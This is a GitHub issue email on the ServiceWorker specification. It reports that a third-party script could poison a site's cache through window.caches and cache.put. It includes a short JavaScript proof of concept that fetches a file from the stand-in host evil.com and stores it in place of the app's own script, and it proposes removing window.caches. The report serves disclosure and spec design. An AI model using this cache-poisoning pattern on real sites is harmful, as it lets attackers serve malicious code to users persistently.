- From: manuelmitasch <notifications@github.com>
- Date: Mon, 11 May 2015 13:26:28 -0700
- To: slightlyoff/ServiceWorker <ServiceWorker@noreply.github.com>
- Message-ID: <slightlyoff/ServiceWorker/issues/698@github.com>
I believe that a combination of `window.caches` and `cache.put` gives a script loaded from a foreign origin the opportunity to add/update resources into the caches with malicious content. Or did I miss something?
If a page includes a script `some-library.js` from a foreign origin (CDN or other). This script could include something like:
```javascript
var goodRequest = new Request('my-app.js');
var badRequest = new Request('https://evil.com/my-bad-app.js', {mode: 'no-cors'});
fetch(badRequest).then(function(badResponse) {
return window.caches.open("my-cache-v1").then(function(cache) {
// put bad response for good request into cache
return cache.put(goodRequest, badResponse);
});
}).then(function() {
console.log('from now on content of evil.com/my-bad-app.js will be served as my-app.js');
});
);
```
**Possible solution**
Remove window.caches. To me having the caches available on window seems like leaking SW internals into global scope. Messing with caches should only be allowed within service worker (as same origin is guaranteed).
---
Reply to this email directly or view it on GitHub:
https://github.com/slightlyoff/ServiceWorker/issues/698
Received on Monday, 11 May 2015 20:26:55 UTC